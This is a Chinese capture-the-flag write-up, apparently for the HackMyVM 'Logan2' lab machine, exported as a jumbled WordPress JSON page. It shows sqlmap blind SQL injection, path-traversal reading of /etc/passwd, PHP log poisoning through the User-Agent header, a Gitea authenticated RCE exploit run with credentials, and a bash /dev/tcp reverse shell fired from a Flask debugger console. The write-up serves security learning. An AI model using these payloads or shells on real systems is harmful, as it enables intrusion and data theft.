<\/div><\/p>\n\u968f\u4fbf\u66f4\u65b0\u4e00\u4e0b\uff0c\u8fdb\u884c\u89e6\u53d1\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u65b9\u6cd5\u4e8c\uff1agitea\u7248\u672c\u6f0f\u6d1e<\/h3>\n
\u53ef\u4ee5\u6784\u9020\u62a5\u9519\u6216\u8005\u76f4\u63a5\u67e5\u627e\u76f8\u5173\u7248\u672c\uff1a<\/p>\n
<\/div><\/p>\n\u67e5\u627e\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ searchsploit gitea 1.12 \n-------------------------------------------------------------------------------------------------------------------------- \nExploit Title | Path\n--------------------------------------------------------------------------------------------------------------------------\nGitea 1.12.5 - Remote Code Execution (Authenticated) |multiple\/webapps\/49571.py\n-------------------------------------------------------------------------------------------------------------------------- \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ searchsploit -m multiple\/webapps\/49571.py\n Exploit: Gitea 1.12.5 - Remote Code Execution (Authenticated)\n URL: https:\/\/www.exploit-db.com\/exploits\/49571\n Path: \/usr\/share\/exploitdb\/exploits\/multiple\/webapps\/49571.py\n Codes: N\/A\n Verified: False\nFile Type: Python script, ASCII text executable\nCopied to: \/home\/kali\/temp\/Logan2\/49571.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ git config --global user.email "hack@whoami.com" \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ git config --global user.name "whoami" \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ python3 49571.py -t http:\/\/192.168.0.145:3000 -u logan -p Super_logan1234 -I 192.168.0.143 -P 1234\n _____ _ _______\n \/ ____(_)__ __| CVE-2020-14144\n | | __ _ | | ___ __ _\n | | |_ | | | |\/ _ \\\/ _` | Authenticated Remote Code Execution\n | |__| | | | | __\/ (_| |\n \\_____|_| |_|\\___|\\__,_| GiTea versions >= 1.1.0 to <= 1.12.5\n\n[+] Starting exploit ...\nhint: Using 'master' as the name for the initial branch. This default branch name\nhint: is subject to change. To configure the initial branch name to use in all\nhint: of your new repositories, which will suppress this warning, call:\nhint: \nhint: git config --global init.defaultBranch <name>\nhint: \nhint: Names commonly chosen instead of 'master' are 'main', 'trunk' and\nhint: 'development'. The just-created branch can be renamed via this command:\nhint: \nhint: git branch -m <name>\nInitialized empty Git repository in \/tmp\/tmp.xppUWOpuwp\/.git\/\n[master (root-commit) 3d511e9] Initial commit\n 1 file changed, 1 insertion(+)\n create mode 100644 README.md\nEnumerating objects: 3, done.\nCounting objects: 100% (3\/3), done.\nWriting objects: 100% (3\/3), 238 bytes | 238.00 KiB\/s, done.\n[+] Exploit completed !<\/code><\/pre>\n<\/div><\/p>\n\u540c\u6837\u53ef\u4ee5\u62ff\u5230\u7528\u6237\uff01<\/p>\n
\u63d0\u6743<\/h2>\n(remote) git@logan2:\/home\/git\/gitea-repositories\/logan\/future_web.git$ cd ~\n(remote) git@logan2:\/home\/git$ whoami;id\ngit\nuid=104(git) gid=113(git) groups=113(git)\n(remote) git@logan2:\/home\/git$ sudo -l\nMatching Defaults entries for git on logan2:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser git may run the following commands on logan2:\n (ALL) NOPASSWD: \/usr\/bin\/python3 \/opt\/app.py\n(remote) git@logan2:\/home\/git$ cd \/opt\nbash: cd: \/opt: Permission denied\n(remote) git@logan2:\/home\/git$ sudo \/usr\/bin\/python3 \/opt\/app.py\n * Serving Flask app 'app'\n * Debug mode: on\nWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8000\n * Running on http:\/\/192.168.0.145:8000\nPress CTRL+C to quit\n * Restarting with stat\n * Debugger is active!\n * Debugger PIN: 100-395-477<\/code><\/pre>\n<\/div><\/p>\nDebugger+SSTI<\/h3>\n
\u7136\u540e\u6253\u5f00debugger<\/code>\u6267\u884c\u547d\u4ee4\uff1a<\/p>\nhttp:\/\/192.168.0.145:8000\/console<\/code><\/pre>\n\u6ca1\u6709\u8fc7\u6ee4\u5565\u7cfb\u7edf\u547d\u4ee4\uff0c\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n
__import__('os').popen('whoami').read();<\/code><\/pre>\n<\/div><\/p>\n\u53ef\u4ee5\u6b63\u5e38\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n
__import__('os').popen('bash -c "exec bash -i &>\/dev\/tcp\/192.168.0.143\/2345 <&1"').read();<\/code><\/pre>\n<\/div><\/p>\n\u5f97\u5230root\uff01\uff01\uff01\uff01<\/p>\n
<\/div><\/p>\n\u5176\u4ed6\u6536\u83b7<\/h2>\n
\u53d1\u73b0\u4e86\u4e00\u4e2a\u65b0\u5de5\u5177lfienum<\/code>\uff0c\u53ef\u4ee5\u5f88\u65b9\u4fbf\u7684\u6d4b\u8bd5lfi\u5305\u542b\u4e86\u54ea\u4e9b\u6587\u4ef6\uff0c\u800c\u4e0d\u5fc5\u624b\u52a8\u6d4b\u8bd5\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"Logan2 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.145 — -A Open 1 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-701","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/701","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=701"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/701\/revisions"}],"predecessor-version":[{"id":703,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/701\/revisions\/703"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=701"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=701"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=701"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
rustscan -a 192.168.0.145 -- -A<\/code><\/pre>\nOpen 192.168.0.145:22\nOpen 192.168.0.145:80\nOpen 192.168.0.145:3000\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n| 256 10:ed:dd:ab:26:fd:f4:9f:28:1e:89:93:f4:58:16:ab (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDnjhFrlAMi06UbJbqL8vCRNan3Azij63mLg\/jbysc+PqRxSiiCv1\/imcjikQLi5SnnyY\/\/gRLa0EJz1D7kLWqk=\n| 256 43:3b:d9:8c:12:44:e9:92:be:cf:1a:78:fd:33:38:67 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIIyIpQI1VgDg\/IXP7Y+NR\/aiAmqxd5KGk\/ZQ8fL77eu\n80\/tcp open http syn-ack Apache httpd 2.4.57 ((Debian))\n| http-methods: \n|_ Supported Methods: POST OPTIONS HEAD GET\n|_http-server-header: Apache\/2.4.57 (Debian)\n|_http-title: Logan\n3000\/tcp open ppp? syn-ack\n| fingerprint-strings: \n| GenericLines, Help: \n| HTTP\/1.1 400 Bad Request\n| Content-Type: text\/plain; charset=utf-8\n| Connection: close\n| Request\n| GetRequest: \n| HTTP\/1.0 200 OK\n| Content-Type: text\/html; charset=UTF-8\n| Set-Cookie: lang=en-US; Path=\/; Max-Age=2147483647\n| Set-Cookie: i_like_gitea=ba7e7fac344f9195; Path=\/; HttpOnly\n| Set-Cookie: _csrf=LpphfML50jUpPn12TIh6yHGf2oI6MTcxMzM1NTE0Mzk4MDMxNzQ0Mw; Path=\/; Expires=Thu, 18 Apr 2024 11:59:03 GMT; HttpOnly\n| X-Frame-Options: SAMEORIGIN\n| Date: Wed, 17 Apr 2024 11:59:03 GMT\n| <!DOCTYPE html>\n| <html lang="en-US" class="theme-">\n| <head data-suburl="">\n| <meta charset="utf-8">\n| <meta name="viewport" content="width=device-width, initial-scale=1">\n| <meta http-equiv="x-ua-compatible" content="ie=edge">\n| <title> Gitea: Git with a cup of tea <\/title>\n| <link rel="manifest" href="\/manifest.json" crossorigin="use-credentials">\n| <meta name="theme-color" content="#6cc644">\n| <meta name="author" content="Gitea - Git with a cup of tea" \/>\n| <meta name="description" content="Gitea (Git with a cup of tea) is a painless\n| HTTPOptions: \n| HTTP\/1.0 404 Not Found\n| Content-Type: text\/html; charset=UTF-8\n| Set-Cookie: lang=en-US; Path=\/; Max-Age=2147483647\n| Set-Cookie: i_like_gitea=e5135b915582dadc; Path=\/; HttpOnly\n| Set-Cookie: _csrf=R4IXxzou684SHeT6Qv1ovgfY0oQ6MTcxMzM1NTE0OTAxNTMwNTM4Nw; Path=\/; Expires=Thu, 18 Apr 2024 11:59:09 GMT; HttpOnly\n| X-Frame-Options: SAMEORIGIN\n| Date: Wed, 17 Apr 2024 11:59:09 GMT\n| <!DOCTYPE html>\n| <html lang="en-US" class="theme-">\n| <head data-suburl="">\n| <meta charset="utf-8">\n| <meta name="viewport" content="width=device-width, initial-scale=1">\n| <meta http-equiv="x-ua-compatible" content="ie=edge">\n| <title>Page Not Found - Gitea: Git with a cup of tea <\/title>\n| <link rel="manifest" href="\/manifest.json" crossorigin="use-credentials">\n| <meta name="theme-color" content="#6cc644">\n| <meta name="author" content="Gitea - Git with a cup of tea" \/>\n|_ <meta name="description" content="Gitea (Git with a c\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port3000-TCP:V=7.94SVN%I=7%D=4\/17%Time=661FB988%P=x86_64-pc-linux-gnu%r\nSF:(GenericLines,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x\nSF:20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba\nSF:d\\x20Request")%r(GetRequest,2942,"HTTP\/1\\.0\\x20200\\x20OK\\r\\nContent-Typ\nSF:e:\\x20text\/html;\\x20charset=UTF-8\\r\\nSet-Cookie:\\x20lang=en-US;\\x20Path\nSF:=\/;\\x20Max-Age=2147483647\\r\\nSet-Cookie:\\x20i_like_gitea=ba7e7fac344f91\nSF:95;\\x20Path=\/;\\x20HttpOnly\\r\\nSet-Cookie:\\x20_csrf=LpphfML50jUpPn12TIh6\nSF:yHGf2oI6MTcxMzM1NTE0Mzk4MDMxNzQ0Mw;\\x20Path=\/;\\x20Expires=Thu,\\x2018\\x2\nSF:0Apr\\x202024\\x2011:59:03\\x20GMT;\\x20HttpOnly\\r\\nX-Frame-Options:\\x20SAM\nSF:EORIGIN\\r\\nDate:\\x20Wed,\\x2017\\x20Apr\\x202024\\x2011:59:03\\x20GMT\\r\\n\\r\\\nSF:n<!DOCTYPE\\x20html>\\n<html\\x20lang=\\"en-US\\"\\x20class=\\"theme-\\">\\n<hea\nSF:d\\x20data-suburl=\\"\\">\\n\\t<meta\\x20charset=\\"utf-8\\">\\n\\t<meta\\x20name=\nSF:\\"viewport\\"\\x20content=\\"width=device-width,\\x20initial-scale=1\\">\\n\\t\nSF:<meta\\x20http-equiv=\\"x-ua-compatible\\"\\x20content=\\"ie=edge\\">\\n\\t<tit\nSF:le>\\x20Gitea:\\x20Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\x20<\/title>\\n\\t<l\nSF:ink\\x20rel=\\"manifest\\"\\x20href=\\"\/manifest\\.json\\"\\x20crossorigin=\\"us\nSF:e-credentials\\">\\n\\t<meta\\x20name=\\"theme-color\\"\\x20content=\\"#6cc644\\\nSF:">\\n\\t<meta\\x20name=\\"author\\"\\x20content=\\"Gitea\\x20-\\x20Git\\x20with\\x\nSF:20a\\x20cup\\x20of\\x20tea\\"\\x20\/>\\n\\t<meta\\x20name=\\"description\\"\\x20con\nSF:tent=\\"Gitea\\x20\\(Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\)\\x20is\\x20a\\x20\nSF:painless")%r(Help,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Typ\nSF:e:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x\nSF:20Bad\\x20Request")%r(HTTPOptions,206C,"HTTP\/1\\.0\\x20404\\x20Not\\x20Found\nSF:\\r\\nContent-Type:\\x20text\/html;\\x20charset=UTF-8\\r\\nSet-Cookie:\\x20lang\nSF:=en-US;\\x20Path=\/;\\x20Max-Age=2147483647\\r\\nSet-Cookie:\\x20i_like_gitea\nSF:=e5135b915582dadc;\\x20Path=\/;\\x20HttpOnly\\r\\nSet-Cookie:\\x20_csrf=R4IXx\nSF:zou684SHeT6Qv1ovgfY0oQ6MTcxMzM1NTE0OTAxNTMwNTM4Nw;\\x20Path=\/;\\x20Expire\nSF:s=Thu,\\x2018\\x20Apr\\x202024\\x2011:59:09\\x20GMT;\\x20HttpOnly\\r\\nX-Frame-\nSF:Options:\\x20SAMEORIGIN\\r\\nDate:\\x20Wed,\\x2017\\x20Apr\\x202024\\x2011:59:0\nSF:9\\x20GMT\\r\\n\\r\\n<!DOCTYPE\\x20html>\\n<html\\x20lang=\\"en-US\\"\\x20class=\\"\nSF:theme-\\">\\n<head\\x20data-suburl=\\"\\">\\n\\t<meta\\x20charset=\\"utf-8\\">\\n\\\nSF:t<meta\\x20name=\\"viewport\\"\\x20content=\\"width=device-width,\\x20initial\nSF:-scale=1\\">\\n\\t<meta\\x20http-equiv=\\"x-ua-compatible\\"\\x20content=\\"ie=\nSF:edge\\">\\n\\t<title>Page\\x20Not\\x20Found\\x20-\\x20\\x20Gitea:\\x20Git\\x20wit\nSF:h\\x20a\\x20cup\\x20of\\x20tea\\x20<\/title>\\n\\t<link\\x20rel=\\"manifest\\"\\x20\nSF:href=\\"\/manifest\\.json\\"\\x20crossorigin=\\"use-credentials\\">\\n\\t<meta\\x\nSF:20name=\\"theme-color\\"\\x20content=\\"#6cc644\\">\\n\\t<meta\\x20name=\\"autho\nSF:r\\"\\x20content=\\"Gitea\\x20-\\x20Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\"\\x\nSF:20\/>\\n\\t<meta\\x20name=\\"description\\"\\x20content=\\"Gitea\\x20\\(Git\\x20wi\nSF:th\\x20a\\x20c");\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.145\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.145\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,git,jpg,txt,png\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 278]\n\/javascript (Status: 301) [Size: 319] [--> http:\/\/192.168.0.145\/javascript\/]\n\/config.php (Status: 200) [Size: 0]\n\/.php (Status: 403) [Size: 278]\n\/server-status (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ sudo dirsearch -u http:\/\/192.168.0.145:3000\/ -e* -i 200,300-399 2>\/dev\/null\n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/Logan2\/reports\/http_192.168.0.145_3000\/__24-04-17_08-03-00.txt\n\nTarget: http:\/\/192.168.0.145:3000\/\n\n[08:03:00] Starting: \n[08:03:00] 302 - 26B - \/js -> \/js\n[08:04:25] 302 - 27B - \/css -> \/css\n[08:04:27] 200 - 160B - \/debug\n[08:04:27] 200 - 160B - \/debug\/\n[08:04:38] 302 - 29B - \/fonts -> \/fonts\n[08:04:47] 302 - 27B - \/img -> \/img\n[08:05:03] 200 - 670B - \/manifest.json\n[08:05:36] 200 - 9KB - \/user\/login\/<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\nWelcome!!!<\/code><\/pre>\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u53d1\u73b0\u4e00\u4e2a\u811a\u672c\uff1a<\/p>\n
document.addEventListener("DOMContentLoaded", function() {\n fetch('\/save-user-agent.php', {\n method: 'POST',\n body: JSON.stringify({ user_agent: navigator.userAgent }),\n headers: {\n 'Content-Type': 'application\/json'\n }\n })\n .then(response => {\n if (response.ok) {\n console.log('User-Agent saved successfully.');\n } else {\n console.error('Error saving User-Agent.');\n }\n })\n .catch(error => {\n console.error('Network error:', error);\n });\n});\n<\/code><\/pre>\n\u9700\u8981\u6211\u4eec\u53d1\u9001POST\uff0c\u6293\u5305\u770b\u4e00\u4e0b\uff1a<\/p>\n
GET \/save-user-agent.php HTTP\/1.1\nHost: 192.168.0.145\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\nContent-Length: 23\n\n{\n "user_agent":"1"\n}<\/code><\/pre>\n\u662f\u6709\u6b63\u5e38\u56de\u5e94\u7684\uff1a<\/p>\n
HTTP\/1.1 200 OK\nDate: Wed, 17 Apr 2024 12:22:15 GMT\nServer: Apache\/2.4.57 (Debian)\nContent-Length: 0\nConnection: close\nContent-Type: text\/html; charset=UTF-8<\/code><\/pre>\nsqlmap\u7206\u7834<\/h3>\n
\u5c1d\u8bd5sqlmap\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ sqlmap sql.txt\n ___\n __H__\n ___ ___[.]_____ ___ ___ {1.8.2#stable}\n|_ -| . [(] | .'| . |\n|___|_ ["]_|_|_|__,| _|\n |_|V... |_| https:\/\/sqlmap.org\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 08:23:38 \/2024-04-17\/\n\n[08:23:48] [CRITICAL] host 'sql.txt' does not exist\n\n[*] ending @ 08:23:48 \/2024-04-17\/<\/code><\/pre>\n\u76f4\u63a5\u641e\uff0c\u8bc6\u522b\u4e0d\u51fa\u6765\uff0c\u5c1d\u8bd5\u4f7f\u7528\u522b\u7684\u65b9\u6cd5\uff1a<\/p>\n
sqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data '{"user_agent":"param"}' --batch<\/code><\/pre>\nsqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:\n---\nParameter: JSON user_agent ((custom) POST)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: {"user_agent":"param' AND (SELECT 7445 FROM (SELECT(SLEEP(5)))THpQ) AND 'rqhs'='rqhs"}\n---\n\nweb server operating system: Linux Debian\nweb application technology: Apache 2.4.57\nback-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<\/code><\/pre>\nsqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data '{"user_agent":"param"}' --batch --dbs<\/code><\/pre>\navailable databases [2]:\n[*] information_schema\n[*] logan<\/code><\/pre>\nsqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data '{"user_agent":"param"}' --batch -D logan --tables<\/code><\/pre>\nDatabase: logan\n[3 tables]\n+----------+\n| browser |\n| comments |\n| users |\n+----------+<\/code><\/pre>\nsqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data '{"user_agent":"param"}' --batch -D logan -T users --columns<\/code><\/pre>\nDatabase: logan\nTable: users\n[2 columns]\n+--------+--------------+\n| Column | Type |\n+--------+--------------+\n| user | varchar(255) |\n| email | varchar(255) |\n+--------+--------------+<\/code><\/pre>\nsqlmap --url http:\/\/192.168.0.145\/save-user-agent.php --method post --data '{"user_agent":"param"}' --batch -D logan -T users --dump<\/code><\/pre>\nDatabase: logan\nTable: users\n[1 entry]\n+------------------------------+--------+\n| email | user |\n+------------------------------+--------+\n| logan@newsitelogan.logan.hmv | logan |\n+------------------------------+--------+<\/code><\/pre>\n\u6dfb\u52a0dns\u89e3\u6790<\/h3>\n
\u53d1\u73b0\u4e86\u4e00\u4e2adns\u89e3\u6790\uff1a<\/p>\n
192.168.0.145 newsitelogan.logan.hmv<\/code><\/pre>\n<\/div><\/p>\n\u5230\u5904\u770b\u770b\uff0c\u6e90\u4ee3\u7801\u53d1\u73b0\uff1a<\/p>\n
<!-- THE OLD WEBSITE WAS VERY UGLY LUCKILY WE HIRED NEW DESIGNERS -->\n.......\n<!-- <img class="space-image" src="\/photos-website-logan.php?photo=moon.png"> -->\n.......\n<!-- <img class="space-image" src="\/photos-website-logan.php?photo=mars.jpg"> -->\n.......\n<!-- <img class="space-image" src="\/photos-website-logan.php?photo=pleyades.jpg"> --><\/code><\/pre>\n\u5c1d\u8bd5\u662f\u5426\u662fLFT\u6f0f\u6d1e\uff1a<\/p>\n
http:\/\/newsitelogan.logan.hmv\/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:108:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nlogan:x:1000:1000:logan,,,:\/home\/logan:\/bin\/bash\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmysql:x:103:112:MySQL Server,,,:\/nonexistent:\/bin\/false\ngit:x:104:113:Git Version Control,,,:\/home\/git:\/bin\/bash\nkevin:x:1001:1001:kevin,,,:\/home\/kevin:\/bin\/bash<\/code><\/pre>\n\u65e5\u5fd7\u6ce8\u5165<\/h3>\n
\u67e5\u770b\u53d1\u73b0apache<\/code>\u7684\u65e5\u5fd7\u662f\u5f00\u542f\u7684\uff1a<\/p>\nhttp:\/\/newsitelogan.logan.hmv\/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/var\/log\/apache2\/access.log<\/code><\/pre>\nLogs are cleaned every minut\n192.168.0.143 - - [17\/Apr\/2024:07:54:12 -0500] "GET \/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/etc\/shadow HTTP\/1.1" 200 203 "http:\/\/newsitelogan.logan.hmv\/\/photos-website-logan.php?photo=\/config.php" "Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0"\n192.168.0.143 - - [17\/Apr\/2024:07:54:19 -0500] "GET \/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/etc\/passwd HTTP\/1.1" 200 765 "http:\/\/newsitelogan.logan.hmv\/\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/etc\/shadow" "Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0"\n........<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528\u4f2a\u534f\u8bae\u8fdb\u884c\u8bfb\u53d6\uff0c\u4f46\u662f\u5931\u8d25\u4e86\u3002<\/p>\n
\u5c1d\u8bd5\u4fee\u6539user-agent<\/code>\u4f20\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n<\/div>
\n<\/div><\/p>\n\u627e\u5230\u7981\u7528\u51fd\u6570\uff1a<\/p>\n
\u5c1d\u8bd5\u4f7f\u7528include()<\/code>\u8fdb\u884c\u7ed5\u8fc7\uff1a<\/p>\nUser-Agent:<?php include($_GET['hack']);?><\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/newsitelogan.logan.hmv\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&hack=..\/..\/..\/..\/..\/..\/etc\/passwd\n<?php include($_GET['hack']);?><\/code><\/pre>\n\u5c1d\u8bd5\u83b7\u53d6\u914d\u7f6e\u6587\u4ef6\uff0c\u56e0\u4e3a\u4e00\u5206\u949f\u6e05\u7406\u4e00\u6b21\uff0c\u6240\u4ee5\u8981\u4e00\u6c14\u5475\u6210\uff1a<\/p>\n
http:\/\/newsitelogan.logan.hmv\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&hack=php:\/\/filter\/convert.base64-encode\/resource=\/etc\/passwd<\/code><\/pre>\n<\/div><\/p>\ncm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbg